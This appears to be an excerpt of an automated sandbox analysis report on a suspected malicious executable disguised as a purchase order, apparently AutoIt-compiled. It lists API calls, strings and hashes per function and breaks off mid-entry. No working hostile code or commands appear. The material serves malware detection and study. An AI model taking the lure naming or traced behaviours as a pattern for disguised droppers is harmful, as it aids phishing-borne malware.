                                  Similarity
                                  • API ID:
                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                  • API String ID: 0-1603158881
                                  • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                  • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                  • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                  • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                  APIs
                                  • CreateMenu.USER32 ref: 00448603
                                  • SetMenu.USER32(?,00000000), ref: 00448613
                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                  • IsMenu.USER32(?), ref: 004486AB
                                  • CreatePopupMenu.USER32 ref: 004486B5
                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                  • DrawMenuBar.USER32 ref: 004486F5
                                  Similarity
                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                  • String ID: 0
                                  • API String ID: 161812096-4108050209
                                  • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                  • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                  • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                  • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe), ref: 00434057
                                  • LoadStringW.USER32(00000000), ref: 00434060
                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                  • LoadStringW.USER32(00000000), ref: 00434078
                                  • _wprintf.LIBCMT ref: 004340A1
                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                  Strings
                                  • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                  • C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe, xrefs: 00434040
                                  Similarity
                                  • API ID: HandleLoadModuleString$Message_wprintf
                                  • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe
                                  • API String ID: 3648134473-3736306650
                                  • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                  • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                  • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                  • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                  • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                  • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                  • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                  • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                  • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                  • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                  APIs
                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,0040F545,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,004A90E8,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,?,0040F545), ref: 0041013C
                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                  • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                  • MoveFileW.KERNEL32(?,?), ref: 00453932
                                  Similarity
                                  • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                  • String ID:
                                  • API String ID: 978794511-0
                                  • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                  • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                  • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                  • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                  • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                  • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                  • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                  Similarity
                                  • API ID: ClearVariant
                                  • String ID:
                                  • API String ID: 1473721057-0
                                  • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                  • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                  • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                  • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                  Similarity
                                  • API ID: _memmove$_memcmp
                                  • String ID: '$\$h
                                  • API String ID: 2205784470-1303700344
                                  • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                  • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                  • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                  • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                  APIs
                                  • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                  • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                  • VariantClear.OLEAUT32 ref: 0045EA6D
                                  • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                  • __swprintf.LIBCMT ref: 0045EC33
                                  • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                  Strings
                                  • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                  • String ID: %4d%02d%02d%02d%02d%02d
                                  • API String ID: 2441338619-1568723262
                                  • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                  • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                  • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                  • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                  APIs
                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                  • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Interlocked$DecrementIncrement$Sleep
                                  • String ID: @COM_EVENTOBJ
                                  • API String ID: 327565842-2228938565
                                  • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                  • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                  • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                  • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                  APIs
                                  • VariantClear.OLEAUT32(?), ref: 0047031B
                                  • VariantClear.OLEAUT32(?), ref: 0047044F
                                  • VariantInit.OLEAUT32(?), ref: 004704A3
                                  • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                  • VariantClear.OLEAUT32(?), ref: 00470516
                                    • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                  • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                    • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                  • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Variant$Clear$Copy$CallDispFuncInit
                                  • String ID: H
                                  • API String ID: 3613100350-2852464175
                                  • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                  • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                  • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                  • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                  APIs
                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                  • 74285CF0.USER32(?), ref: 00426F50
                                  • UnregisterHotKey.USER32(?), ref: 00426F77
                                  • FreeLibrary.KERNEL32(?), ref: 0042701F
                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Free$74285LibrarySendStringUnregisterVirtual
                                  • String ID: close all
                                  • API String ID: 3499181032-3243417748
                                  • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                  • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                  • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                  • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                  APIs
                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                  • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                  • String ID:
                                  • API String ID: 1291720006-3916222277
                                  • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                  • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                  • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                  • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                  APIs
                                  • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                  • IsMenu.USER32(?), ref: 0045FC5F
                                  • CreatePopupMenu.USER32 ref: 0045FC97
                                  • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Menu$Item$CountCreateInfoInsertPopup
                                  • String ID: 0$2
                                  • API String ID: 93392585-3793063076
                                  • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                  • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                  • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                  • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                  APIs
                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                  • VariantClear.OLEAUT32(?), ref: 00435320
                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                  • VariantClear.OLEAUT32(?), ref: 004353B3
                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                  • String ID: crts
                                  • API String ID: 586820018-3724388283
                                  • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                  • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                  • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                  • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                  APIs
                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,0040F545,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,004A90E8,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,?,0040F545), ref: 0041013C
                                  • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                  • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                  • _wcscat.LIBCMT ref: 0044BCAF
                                  • _wcslen.LIBCMT ref: 0044BCBB
                                  • _wcslen.LIBCMT ref: 0044BCD1
                                  • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                  • String ID: \*.*
                                  • API String ID: 2326526234-1173974218
                                  • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                  • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                  • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                  • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                  APIs
                                    • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                  • _wcslen.LIBCMT ref: 004335F2
                                  • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                  • GetLastError.KERNEL32 ref: 0043362B
                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                  • _wcsrchr.LIBCMT ref: 00433666
                                    • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                  • String ID: \
                                  • API String ID: 321622961-2967466578
                                  • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                  • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                  • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                  • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __wcsnicmp
                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                  • API String ID: 1038674560-2734436370
                                  • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                  • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                  • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                  • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                  APIs
                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                  • __lock.LIBCMT ref: 00417981
                                    • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                    • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                    • Part of subcall function 004182CB: RtlEnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                  • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                  • __lock.LIBCMT ref: 004179A2
                                  • ___addlocaleref.LIBCMT ref: 004179C0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                  • String ID: KERNEL32.DLL$pI
                                  • API String ID: 637971194-197072765
                                  • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
